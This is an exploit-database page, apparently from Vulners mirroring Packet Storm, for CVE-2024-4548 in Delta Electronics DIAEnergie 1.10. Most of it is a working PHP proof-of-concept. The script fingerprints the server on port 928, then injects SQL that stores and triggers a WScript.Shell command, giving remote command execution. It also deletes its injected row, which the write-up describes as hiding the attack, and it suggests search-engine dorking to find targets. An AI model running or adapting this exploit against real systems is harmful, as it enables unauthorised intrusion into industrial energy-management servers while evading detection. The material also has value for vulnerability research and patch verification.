DIAEnergie 1.10 SQL Injection

🗓️ 04 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 261 Views

DIAEnergie 1.10 PHP Code Injection vulnerability allows SQL command injection on targeted servers.

Reporter	Title	Published	Views	Family All 13
0day.today	DIAEnergie 1.10 SQL Injection Exploit	22 Aug 202400:00	–	zdt
Circl	CVE-2024-4548	21 Aug 202414:03	–	circl
CNNVD	Delta Electronics DIAEnergie SQL注入漏洞	6 May 202400:00	–	cnnvd
CNVD	Delta Electronics DIAEnergie SQL Injection Vulnerability (CNVD-2024-29663)	10 May 202400:00	–	cnvd
CVE	CVE-2024-4548	6 May 202413:51	–	cve
Cvelist	CVE-2024-4548 Delta Electronics DIAEnergie SQL Injection	6 May 202413:51	–	cvelist
Metasploit	DIAEnergie SQL Injection (CVE-2024-4548)	21 Aug 202418:52	–	metasploit
NVD	CVE-2024-4548	6 May 202414:15	–	nvd
Packet Storm	DIAEnergie 1.10 SQL Injection	22 Aug 202400:00	–	packetstorm
Positive Technologies	PT-2024-31657 · Delta Electronics · Diaenergie	6 May 202400:00	–	ptsecurity

=============================================================================================================================================
    | # Title     : DIAEnergie 1.10 PHP Code Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  The code attempts to establish a connection with the targeted server over the network.
    
        If the connection is successful, it sends a malicious SQL query to inject commands into the database.
    
        After injection, the script cleans the logs to ensure that the attack is not easily detected.
    	
    	( https://packetstorm.news/files/id/180334/  CVE-2024-4548 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 114
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class CustomSQLInjection
    {
        const TARGET_PORT = 928;
        const TARGET_HOST = 'target_host'; // ضع عنوان الهدف هنا
    
        private $payload;
    
        public function __construct($cmd)
        {
            // تحديد الحمولة لتنفيذ الأوامر
            $this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
        }
    
        public function check()
        {
            try {
                $sock = $this->connect();
                fwrite($sock, 'Who is it?');
                $res = fread($sock, 1024);
    
                if (empty($res)) {
                    echo "Received an empty response.\n";
                    return 'Unknown';
                }
    
                echo "Who is it response: $res\n";
    
                preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);
    
                if (empty($version)) {
                    return 'Detected';
                }
    
                echo "Version retrieved: " . $version[0] . "\n";
    
                if (version_compare($version[0], '1.10.1.8610', '>')) {
                    return 'Safe';
                }
    
                return 'Appears';
    
            } catch (Exception $e) {
                echo "Error: " . $e->getMessage() . "\n";
                return 'Unknown';
            }
        }
    
        public function exploit()
        {
            // حقن الحمولة
            $this->execute_command($this->payload);
        }
    
        private function execute_command($cmd)
        {
            $scname = bin2hex(random_bytes(rand(5, 10)));
    
            echo "Using random script name: $scname\n";
    
            $random_date = date('Y-m-d', rand(2024, 2026)) . '-' . sprintf('%02d', rand(1, 12)) . '-' . sprintf('%02d', rand(1, 29));
            echo "Using random date: $random_date\n";
    
            $random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
            echo "Using random time: $random_time\n";
    
            try {
                echo "Sending SQL injection...\n";
    
                $sock = $this->connect();
                fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
                $res = fread($sock, 1024);
    
                if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Injection - Expected response received: $res\n";
    
                fclose($sock);
    
                // Trigger the script execution
                echo "Triggering script execution...\n";
                $sock = $this->connect();
                fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
                $res = fread($sock, 1024);
    
                if ($res !== 'Recalculate Script Start!') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Trigger - Expected response received: $res\n";
    
                fclose($sock);
    
                echo "Script successfully injected, check thy shell.\n";
    
            } catch (Exception $e) {
                echo "Error: " . $e->getMessage() . "\n";
                $this->cleanup($scname);
            }
        }
    
        private function cleanup($scname)
        {
            echo "Cleaning up database...\n";
            try {
                $sock = $this->connect();
                fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
                $res = fread($sock, 1024);
    
                if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Cleanup - Expected response received: $res\n";
                fclose($sock);
    
            } catch (Exception $e) {
                echo "Error during cleanup: " . $e->getMessage() . "\n";
            }
        }
    
        private function connect()
        {
            // الاتصال باستخدام fsockopen
            $sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
            if (!$sock) {
                throw new Exception("Connection failed: $errstr ($errno)");
            }
            return $sock;
        }
    }
    
    // تحديد الأمر الذي سيتم تنفيذه
    $cmd = 'dir'; // استبدل هذا الأمر بالأمر الذي ترغب في تنفيذه
    $exploit = new CustomSQLInjection($cmd);
    $exploit->check();
    $exploit->exploit();
    
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

04 Mar 2025 00:00Current

10High risk

Vulners AI Score10

CVSS 3.19.8

EPSS0.48376

SSVC